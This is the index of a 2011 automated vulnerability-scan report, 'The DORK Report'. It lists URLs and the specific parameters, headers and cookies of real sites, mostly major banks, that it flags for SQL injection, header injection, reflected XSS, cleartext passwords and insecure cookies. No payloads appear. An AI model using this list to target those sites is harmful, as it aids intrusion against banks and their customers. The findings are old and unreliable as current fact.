The DORK Report, XSS, SQL Injection, HTTP HEader Injection, 2-4-2011

The DORK Report for Feb 4, 2011 | CloudScan Vulnerability Crawler

Report generated by CloudScan Vulnerability Crawler at Sun Feb 06 13:16:15 CST 2011.

DORK CWE-79 XSS Report

Loading

1. SQL injection

1.1. http://www.learningsolutions.com.hk/index.php [User-Agent HTTP header]

1.2. http://www.thestandard.com.hk/news_detail.asp [art_id parameter]

1.3. http://www.youtube.com/ [Referer HTTP header]

2. HTTP header injection

2.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

2.2. http://locators.bankofamerica.com/locator/locator/LocatorAction.do [REST URL parameter 3]

2.3. http://www.fis.com/fis/worldnews/worldnews.asp [REST URL parameter 1]

2.4. http://www.fis.com/fis/worldnews/worldnews.asp [REST URL parameter 2]

3. Cross-site scripting (reflected)

3.1. http://ad.thehill.com/www/delivery/al.php [shifth parameter]

3.2. http://ad.thehill.com/www/delivery/al.php [shiftv parameter]

3.3. http://api.facebook.com/restserver.php [method parameter]

3.4. http://api.facebook.com/restserver.php [urls parameter]

3.5. http://api.viglink.com/api/click [format parameter]

3.6. http://api.viglink.com/api/click [jsonp parameter]

3.7. http://api.viglink.com/api/click [out parameter]

3.8. http://api.viglink.com/api/click [out parameter]

3.9. http://api.viglink.com/api/ping [key parameter]

3.10. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 4]

3.11. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [name of an arbitrarily supplied request parameter]

3.12. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [nsextt parameter]

3.13. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [nsextt parameter]

3.14. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 4]

3.15. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 5]

3.16. http://citi.bridgetrack.com/a/s/ [BT_PID parameter]

3.17. http://citi.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter]

3.18. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]

3.19. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]

3.20. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment [REST URL parameter 4]

3.21. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment [REST URL parameter 4]

3.22. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]

3.23. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]

3.24. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment [REST URL parameter 4]

3.25. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment [REST URL parameter 4]

3.26. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]

3.27. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]

3.28. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment [REST URL parameter 4]

3.29. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment [REST URL parameter 4]

3.30. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]

3.31. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]

3.32. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment [REST URL parameter 4]

3.33. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment [REST URL parameter 4]

3.34. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]

3.35. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]

3.36. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment [REST URL parameter 4]

3.37. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment [REST URL parameter 4]

3.38. http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/ [name of an arbitrarily supplied request parameter]

3.39. http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/ [name of an arbitrarily supplied request parameter]

3.40. http://community.invisionpower.com/files/file/3937-peace/ [name of an arbitrarily supplied request parameter]

3.41. http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/ [name of an arbitrarily supplied request parameter]

3.42. http://community.invisionpower.com/files/file/3939-vietnamese-3xx-lang/ [name of an arbitrarily supplied request parameter]

3.43. http://community.invisionpower.com/files/file/3940-dp31-ihost/ [name of an arbitrarily supplied request parameter]

3.44. http://community.invisionpower.com/files/file/3941-vanilla-valentine/ [name of an arbitrarily supplied request parameter]

3.45. http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/ [name of an arbitrarily supplied request parameter]

3.46. http://community.invisionpower.com/files/file/3943-speed/ [name of an arbitrarily supplied request parameter]

3.47. http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/ [name of an arbitrarily supplied request parameter]

3.48. http://community.invisionpower.com/resources/documentation/index.html [name of an arbitrarily supplied request parameter]

3.49. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17 [name of an arbitrarily supplied request parameter]

3.50. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514 [name of an arbitrarily supplied request parameter]

3.51. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18 [name of an arbitrarily supplied request parameter]

3.52. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 [name of an arbitrarily supplied request parameter]

3.53. http://community.invisionpower.com/resources/official.html [name of an arbitrarily supplied request parameter]

3.54. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/ [REST URL parameter 2]

3.55. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/ [REST URL parameter 3]

3.56. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi [name of an arbitrarily supplied request parameter]

3.57. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]

3.58. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]

3.59. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]

3.60. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]

3.61. http://search.wareseeker.com/ip-board/ [REST URL parameter 1]

3.62. http://search.wareseeker.com/ip-board/ [name of an arbitrarily supplied request parameter]

3.63. http://tags.expo9.exponential.com/tags/WareSeekercom/ROS/tags.js [REST URL parameter 2]

3.64. http://tags.expo9.exponential.com/tags/WareSeekercom/ROS/tags.js [REST URL parameter 3]

3.65. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 3]

3.66. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 4]

3.67. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 4]

3.68. http://weather.weatherbug.com/desktop-weather/web-widgets/getSticker.html [ZCode parameter]

3.69. http://weather.weatherbug.com/desktop-weather/web-widgets/getSticker.html [ZCode parameter]

3.70. http://www.arbornetworks.com/index.php [Itemid parameter]

3.71. http://www.arbornetworks.com/index.php [id parameter]

3.72. http://www.arbornetworks.com/index.php [name of an arbitrarily supplied request parameter]

3.73. http://www.bankofamerica.com/creditcards/index.cfm [REST URL parameter 1]

3.74. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 1]

3.75. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 2]

3.76. http://www.bankofamerica.com/financialtools/index.cfm [REST URL parameter 1]

3.77. http://www.bankofamerica.com/findit/locator.cfm [REST URL parameter 1]

3.78. http://www.bankofamerica.com/help/equalhousing.cfm [REST URL parameter 1]

3.79. http://www.bankofamerica.com/help/equalhousing_popup.cfm [REST URL parameter 1]

3.80. http://www.bankofamerica.com/help/index.cfm [REST URL parameter 1]

3.81. http://www.bankofamerica.com/loansandhomes/index.cfm [REST URL parameter 1]

3.82. http://www.bankofamerica.com/onlinebanking/index.cfm [REST URL parameter 1]

3.83. http://www.bankofamerica.com/pap/index.cfm [REST URL parameter 1]

3.84. http://www.bankofamerica.com/studentbanking/index.cfm [REST URL parameter 1]

3.85. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [REST URL parameter 1]

3.86. http://www.branchmap.com/mapserver.php [city parameter]

3.87. http://www.branchmap.com/mapserver.php [dist parameter]

3.88. http://www.branchmap.com/mapserver.php [zip parameter]

3.89. http://www.branchmap.com/mapserver.php [zoom parameter]

3.90. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [REST URL parameter 2]

3.91. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]

3.92. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]

3.93. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]

3.94. http://www.chasemilitary.com/ [name of an arbitrarily supplied request parameter]

3.95. http://www.chasemilitary.com/Default.aspx [ada parameter]

3.96. http://www.chasemilitary.com/Default.aspx [name of an arbitrarily supplied request parameter]

3.97. http://www.google.com/advanced_search [hl parameter]

3.98. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

3.99. http://www.google.com/advanced_search [prmd parameter]

3.100. http://www.google.com/advanced_search [q parameter]

3.101. http://www.google.com/images [q parameter]

3.102. http://www.invisionpower.com/products/board/features/ [name of an arbitrarily supplied request parameter]

3.103. http://www.invisionpower.com/products/nexus/features/store.php [name of an arbitrarily supplied request parameter]

3.104. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx [name of an arbitrarily supplied request parameter]

3.105. http://www.learningsolutions.com.hk/index.php [Itemid parameter]

3.106. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html [name of an arbitrarily supplied request parameter]

3.107. http://www.merrilledge.com/m/pages/self-directed-investing.aspx [name of an arbitrarily supplied request parameter]

3.108. http://www.merrilledge.com/m/pages/self-directed-investing.aspx [src_cd parameter]

3.109. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx [name of an arbitrarily supplied request parameter]

3.110. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx [src_cd parameter]

3.111. https://www.merrilledge.com/m/pages/home.aspx [name of an arbitrarily supplied request parameter]

3.112. http://www.retirement.merrilledge.com/IRA/ScriptResource.axd [d parameter]

3.113. http://www.retirement.merrilledge.com/IRA/WebResource.axd [d parameter]

3.114. http://www.retirement.merrilledge.com/IRA/pages/home.aspx [name of an arbitrarily supplied request parameter]

3.115. https://www2.bankofamerica.com/promos/jump/greatdeals/ [name of an arbitrarily supplied request parameter]

3.116. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [Referer HTTP header]

3.117. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

3.118. http://www.bankofamerica.com/help/equalhousing_popup.cfm [Referer HTTP header]

3.119. http://www.jpmorgan.com/pages/jpmorgan [User-Agent HTTP header]

3.120. http://www.arbornetworks.com/ [mbfcookie[lang] cookie]

3.121. http://www.arbornetworks.com/cleanpipes [mbfcookie[lang] cookie]

3.122. http://www.arbornetworks.com/cn/865.html [mbfcookie[lang] cookie]

3.123. http://www.arbornetworks.com/cn/infrastructure-security-report.html [mbfcookie[lang] cookie]

3.124. http://www.arbornetworks.com/contact [mbfcookie[lang] cookie]

3.125. http://www.arbornetworks.com/de/5.html [mbfcookie[lang] cookie]

3.126. http://www.arbornetworks.com/de/infrastructure-security-report.html [mbfcookie[lang] cookie]

3.127. http://www.arbornetworks.com/deeppacketinspection [mbfcookie[lang] cookie]

3.128. http://www.arbornetworks.com/en/9.html [mbfcookie[lang] cookie]

3.129. http://www.arbornetworks.com/en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html [mbfcookie[lang] cookie]

3.130. http://www.arbornetworks.com/en/arbor-in-action-global-network-security-solution-resources.html [mbfcookie[lang] cookie]

3.131. http://www.arbornetworks.com/en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html [mbfcookie[lang] cookie]

3.132. http://www.arbornetworks.com/en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html [mbfcookie[lang] cookie]

3.133. http://www.arbornetworks.com/en/asert-arbor-security-engineering-response-team-2.html [mbfcookie[lang] cookie]

3.134. http://www.arbornetworks.com/en/atlas-global-network-threat-analysis-460.html [mbfcookie[lang] cookie]

3.135. http://www.arbornetworks.com/en/channel-partners-3.html [mbfcookie[lang] cookie]

3.136. http://www.arbornetworks.com/en/com-5fcontent/view-2.html [mbfcookie[lang] cookie]

3.137. http://www.arbornetworks.com/en/com-5fcontent/view-3.html [mbfcookie[lang] cookie]

3.138. http://www.arbornetworks.com/en/contact-us-4.html [mbfcookie[lang] cookie]

3.139. http://www.arbornetworks.com/en/contact-us.html [mbfcookie[lang] cookie]

3.140. http://www.arbornetworks.com/en/customer-solution-briefs.html [mbfcookie[lang] cookie]

3.141. http://www.arbornetworks.com/en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html [mbfcookie[lang] cookie]

3.142. http://www.arbornetworks.com/en/ipv6-report.html [mbfcookie[lang] cookie]

3.143. http://www.arbornetworks.com/en/meet-our-partners.html [mbfcookie[lang] cookie]

3.144. http://www.arbornetworks.com/en/network-monitoring-security-news-events.html [mbfcookie[lang] cookie]

3.145. http://www.arbornetworks.com/en/network-security-experts-2.html [mbfcookie[lang] cookie]

3.146. http://www.arbornetworks.com/en/network-security-monitoring-solutions-for-your-industry.html [mbfcookie[lang] cookie]

3.147. http://www.arbornetworks.com/en/network-security-research-2.html [mbfcookie[lang] cookie]

3.148. http://www.arbornetworks.com/en/network-security-visibility-products-235.html [mbfcookie[lang] cookie]

3.149. http://www.arbornetworks.com/en/network-solutions-we-provide.html [mbfcookie[lang] cookie]

3.150. http://www.arbornetworks.com/en/news-events.html [mbfcookie[lang] cookie]

3.151. http://www.arbornetworks.com/en/partnership-inquiry-form.html [mbfcookie[lang] cookie]

3.152. http://www.arbornetworks.com/en/services-network-support-maintenance-training-2.html [mbfcookie[lang] cookie]

3.153. http://www.arbornetworks.com/en/solution-partners-4.html [mbfcookie[lang] cookie]

3.154. http://www.arbornetworks.com/en/solutions-for-places-in-your-network.html [mbfcookie[lang] cookie]

3.155. http://www.arbornetworks.com/en/solutions-for-your-business-needs.html [mbfcookie[lang] cookie]

3.156. http://www.arbornetworks.com/en/technology-partners-4.html [mbfcookie[lang] cookie]

3.157. http://www.arbornetworks.com/en/what-we-do-network-security-solutions-services.html [mbfcookie[lang] cookie]

3.158. http://www.arbornetworks.com/en/white-papers-global-network-security-topics-2.html [mbfcookie[lang] cookie]

3.159. http://www.arbornetworks.com/es/5.html [mbfcookie[lang] cookie]

3.160. http://www.arbornetworks.com/es/infrastructure-security-report.html [mbfcookie[lang] cookie]

3.161. http://www.arbornetworks.com/fr/4.html [mbfcookie[lang] cookie]

3.162. http://www.arbornetworks.com/fr/infrastructure-security-report.html [mbfcookie[lang] cookie]

3.163. http://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]

3.164. http://www.arbornetworks.com/it [mbfcookie[lang] cookie]

3.165. http://www.arbornetworks.com/it/infrastructure-security-report.html [mbfcookie[lang] cookie]

3.166. http://www.arbornetworks.com/jp/2.html [mbfcookie[lang] cookie]

3.167. http://www.arbornetworks.com/jp/infrastructure-security-report.html [mbfcookie[lang] cookie]

3.168. http://www.arbornetworks.com/kr/2.html [mbfcookie[lang] cookie]

3.169. http://www.arbornetworks.com/kr/network-infrastructure-security-report.html [mbfcookie[lang] cookie]

3.170. http://www.arbornetworks.com/privacy_policy.php [mbfcookie[lang] cookie]

3.171. https://www.arbornetworks.com/ [mbfcookie[lang] cookie]

3.172. https://www.arbornetworks.com/en/lost-password-3.html [mbfcookie[lang] cookie]

3.173. https://www.arbornetworks.com/en/partner-portal-home.html [mbfcookie[lang] cookie]

3.174. https://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]

3.175. https://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]

3.176. https://www.arbornetworks.com/register.html [mbfcookie[lang] cookie]

3.177. https://www.bankofamerica.com/privacy/Control.do [BOA_0020 cookie]

3.178. https://www.bankofamerica.com/privacy/index.jsp [BOA_0020 cookie]

3.179. https://www.bankofamerica.com/smallbusiness/index.jsp [BOA_0020 cookie]

3.180. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx [name of an arbitrarily supplied request parameter]

3.181. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx [src_cd parameter]

3.182. http://www.retirement.merrilledge.com/IRA/pages/home.aspx [pxs cookie]

4. Cleartext submission of password

4.1. http://community.invisionpower.com/index.php

4.2. http://community.invisionpower.com/resources/documentation/index.html

4.3. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17

4.4. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514

4.5. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18

4.6. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536

4.7. http://fis.com/fis/worldnews/worldnews.asp

4.8. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/

4.9. http://ipboard-software.software.informer.com/

4.10. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html

4.11. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html

4.12. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

4.13. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

4.14. http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html

4.15. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html

4.16. http://www.enewspf.com/latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html

4.17. http://www.fis.com/fis/worldnews/worldnews.asp

4.18. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html

4.19. http://www.sipc.org/

5. XML injection

6. SSL cookie without secure flag set

6.1. https://arbor.custhelp.com/app/account/profile

6.2. https://arbor.custhelp.com/app/account/profile/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

6.3. https://arbor.custhelp.com/app/account/questions/list

6.4. https://arbor.custhelp.com/app/account/questions/list/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

6.5. https://arbor.custhelp.com/app/answers/docs

6.6. https://arbor.custhelp.com/app/answers/docs/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

6.7. https://arbor.custhelp.com/app/answers/list

6.8. https://arbor.custhelp.com/app/answers/list/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

6.9. https://arbor.custhelp.com/app/home

6.10. https://arbor.custhelp.com/app/ipreaddress

6.11. https://arbor.custhelp.com/app/utils/account_assistance

6.12. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

6.13. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

6.14. https://arbor.custhelp.com/app/webinar

6.15. https://arbor.custhelp.com/app/webinar/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

6.16. https://chaseonline.chase.com/

6.17. https://locations.citibank.com/citibankV2/prxInput.aspx

6.18. https://militarybankonline.bankofamerica.com/efs/servlet/military/login.jsp

6.19. https://myaccountsaws.navyfcu.org/mfnfopwd/

6.20. https://online.cardmemberservices.com/

6.21. https://secure.opinionlab.com/ccc01/comment_card.asp

6.22. https://secure.opinionlab.com/rate36s.asp

6.23. https://shop.aafes.com/shop/ECC/Account/OlApp.aspx

6.24. https://sitekey.bankofamerica.com/sas/resetIDScreen.do

6.25. https://sitekey.bankofamerica.com/sas/resetPasscodeScreen.do

6.26. https://sitekey.bankofamerica.com/sas/signon.do

6.27. https://support01.arbornetworks.com/

6.28. https://usa.visa.com/signaturesouthwest/index.jsp

6.29. https://usa.visa.com/specialOffers/FUSA_Amazon/offers.jsp

6.30. https://www.1sttools.com/loginout/login.asp

6.31. https://www.bankofamerica.com/

6.32. https://www.bankofamerica.com/Control.do

6.33. https://www.bankofamerica.com/credit-cards/cardoverview.action

6.34. https://www.bankofamerica.com/deposits/index.action

6.35. https://www.bankofamerica.com/homepage/WidgetAction.go

6.36. https://www.bankofamerica.com/homepage/overview.go

6.37. https://www.bankofamerica.com/homepage/stateSelect.go

6.38. https://www.bankofamerica.com/hub/index.action

6.39. https://www.bankofamerica.com/myexpression_banking/

6.40. https://www.bankofamerica.com/planning/

6.41. https://www.bankofamerica.com/planning/investments.action

6.42. https://www.bankofamerica.com/privacy/Control.do

6.43. https://www.bankofamerica.com/privacy/index.jsp

6.44. https://www.bankofamerica.com/retirementcenter/

6.45. https://www.bankofamerica.com/search/Search.do

6.46. https://www.bankofamerica.com/sitemap/index.action

6.47. https://www.bankofamerica.com/smallbusiness/index.jsp

6.48. https://www.chase.com/MilitaryLendingProgram

6.49. https://www.chase.com/ccp/index.jsp

6.50. https://www.chase.com/chf/mortgage/om_chasecom_redirect

6.51. https://www.chase.com/framework/skeletons/psmgenskel

6.52. https://www.chase.com/framework/skins/psmgenskin

6.53. https://www.chase.com/framework/skins/psmgenskin/images

6.54. https://www.chase.com/index.jsp

6.55. https://www.chase.com/online/logon/on_successful_logon.jsp

6.56. https://www.citibank.com/us/cards/index.jsp

6.57. https://www.esp01.pnc.com/LaunchPad/dflt/Login.pncadv

6.58. https://www.onlinebanking.pnc.com/alservlet/ForgotUserIdServlet

6.59. https://www.onlinebanking.pnc.com/alservlet/OnlineBankingServlet

6.60. https://www.pnc.com/webapp/sec/Forms.do

6.61. https://www.pnc.com/webapp/sec/ProductsAndService.do

6.62. https://www.pnc.com/webapp/unsec/Blank.do

6.63. https://www.pnc.com/webapp/unsec/Gateway.do

6.64. https://www.pnc.com/webapp/unsec/Homepage.do

6.65. https://www.pnc.com/webapp/unsec/Homepage.do

6.66. https://www.pnc.com/webapp/unsec/NCProductsAndService.do

6.67. https://www.pnc.com/webapp/unsec/ProductsAndService.do

6.68. https://www.pnc.com/webapp/unsec/Solutions.do

6.69. https://www.pnc.com/webapp/unsec/depositRates/init.app

6.70. https://www.pnc.com/webapp/unsec/homeEquity/init.app

6.71. https://www.retirementgold.com/

6.72. https://www.smart-hsa.com/pnc/

6.73. https://www.smart-hsa.com/pnc/

6.74. https://www4.usbank.com/internetBanking/RequestRouter

6.75. https://www4.usbank.com/internetBanking/RequestRouter

6.76. https://www4.usbank.com/internetBanking/RequestRouter

6.77. https://www4.usbank.com/internetBanking/en_us/info/BrowserRequirementsOut.jsp

6.78. https://www4.usbank.com/internetBanking/en_us/info/BrowserRequirementsOut.jsp

6.79. https://www4.usbank.com/internetBanking/en_us/info/ContactUsOut.jsp

6.80. https://www4.usbank.com/internetBanking/en_us/info/ContactUsOut.jsp

6.81. https://www6.bankofamerica.com/planning/investments.action

6.82. https://chaseonline.chase.com/auth/login.aspx

6.83. https://chaseonline.chase.com/chaseonline/reidentify/sso_reidentify.jsp

6.84. https://chaseonline.chase.com/js/Reporting.js

6.85. https://myaccounts.navyfcu.org/cgi-bin/ifsewwwc

6.86. https://online.wellsfargo.com/signon

6.87. https://onlineservices.wachovia.com/auth/AuthService

6.88. https://resources.cardmemberservices.com/MyAccounts.aspx

6.89. https://resources.chase.com/MyAccounts.aspx

6.90. https://s.xp1.ru4.com/meta

6.91. https://stg.xp1.ru4.com/meta

6.92. https://tc.bankofamerica.com/c

6.93. https://www.arbornetworks.com/

6.94. https://www.arbornetworks.com/en/lost-password-3.html

6.95. https://www.arbornetworks.com/en/partner-portal-home.html

6.96. https://www.arbornetworks.com/index.php

6.97. https://www.arbornetworks.com/register.html

6.98. https://www.bankofamerica.com/retirementcenter

6.99. https://www.capitalone.com/

6.100. https://www.capitalone.com/creditcards/gateway/

6.101. https://www.capitalone.com/indexn.php

6.102. https://www.capitalone.com/scripts/thirdparty/xplus1/xp1vars.js.php

6.103. https://www.chase.com/

6.104. https://www.chase.com/wamuwelcome3/

6.105. https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay

6.106. https://www.merrilledge.com/m/pages/home.aspx

6.107. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx

6.108. https://www.myschedule.navyfederal.org/

6.109. https://www.mystreetscape.com/my/charteroneinvest

6.110. https://www.mystreetscape.com/my/citizensinvest

6.111. https://www.wellsfargo.com/

6.112. https://www.wellsfargo.com/Clickthrough&RequestType=Click&COID=

6.113. https://www.wellsfargo.com/about/diversity/

6.114. https://www.wellsfargo.com/autoloans/

6.115. https://www.wellsfargo.com/autoloans/apply

6.116. https://www.wellsfargo.com/browser/jaws_setting

6.117. https://www.wellsfargo.com/careers/

6.118. https://www.wellsfargo.com/checking/

6.119. https://www.wellsfargo.com/com/comintro

6.120. https://www.wellsfargo.com/credit_cards/

6.121. https://www.wellsfargo.com/credit_cards/select_card

6.122. https://www.wellsfargo.com/equity/

6.123. https://www.wellsfargo.com/equity/rate_payments/information/rate_calc

6.124. https://www.wellsfargo.com/help/

6.125. https://www.wellsfargo.com/help/faqs/signon_faqs

6.126. https://www.wellsfargo.com/help/services

6.127. https://www.wellsfargo.com/insurance/

6.128. https://www.wellsfargo.com/insurance/id_credit_protection/idtheft

6.129. https://www.wellsfargo.com/investing/hsa/enroll

6.130. https://www.wellsfargo.com/investing/investmentservices/

6.131. https://www.wellsfargo.com/investing/more

6.132. https://www.wellsfargo.com/investing/mutual_funds/

6.133. https://www.wellsfargo.com/investing/retirement/

6.134. https://www.wellsfargo.com/investing/retirement/openira/

6.135. https://www.wellsfargo.com/jump/about/fdic

6.136. https://www.wellsfargo.com/jump/applications/inprogress

6.137. https://www.wellsfargo.com/jump/wachovia/EFS/WAC1

6.138. https://www.wellsfargo.com/jump/wachovia/insurance/identity

6.139. https://www.wellsfargo.com/jump/wachovia/mortgage/firsttimebuyer

6.140. https://www.wellsfargo.com/locator

6.141. https://www.wellsfargo.com/locator/atm/preSearch

6.142. https://www.wellsfargo.com/locator/atm/search

6.143. https://www.wellsfargo.com/mortgage/

6.144. https://www.wellsfargo.com/mortgage/rates

6.145. https://www.wellsfargo.com/online_brokerage/education/trading/volatile/

6.146. https://www.wellsfargo.com/per/more/banking

6.147. https://www.wellsfargo.com/per/more/loans_credit

6.148. https://www.wellsfargo.com/personal_credit/

6.149. https://www.wellsfargo.com/personal_credit/rate_payments/rate_calc_main

6.150. https://www.wellsfargo.com/privacy_security/

6.151. https://www.wellsfargo.com/privacy_security/fraud/

6.152. https://www.wellsfargo.com/privacy_security/fraud/report/

6.153. https://www.wellsfargo.com/privacy_security/fraud/report/fraud

6.154. https://www.wellsfargo.com/privacy_security/online/guarantee

6.155. https://www.wellsfargo.com/products_services/HE_selector

6.156. https://www.wellsfargo.com/products_services/applications_viewall

6.157. https://www.wellsfargo.com/products_services/brokerage_cklist

6.158. https://www.wellsfargo.com/products_services/deposit_cklist

6.159. https://www.wellsfargo.com/products_services/pll_select

6.160. https://www.wellsfargo.com/rates/rates_viewall

6.161. https://www.wellsfargo.com/savings_cds/

6.162. https://www.wellsfargo.com/savings_cds/apply

6.163. https://www.wellsfargo.com/savings_cds/cds

6.164. https://www.wellsfargo.com/search/search

6.165. https://www.wellsfargo.com/sitemap

6.166. https://www.wellsfargo.com/student/

6.167. https://www.wellsfargo.com/student/loans/apply

6.168. https://www.wellsfargo.com/tas

6.169. https://www.wellsfargo.com/theprivatebank/

6.170. https://www.wellsfargo.com/wachovia

6.171. https://www.wellsfargo.com/wachovia/

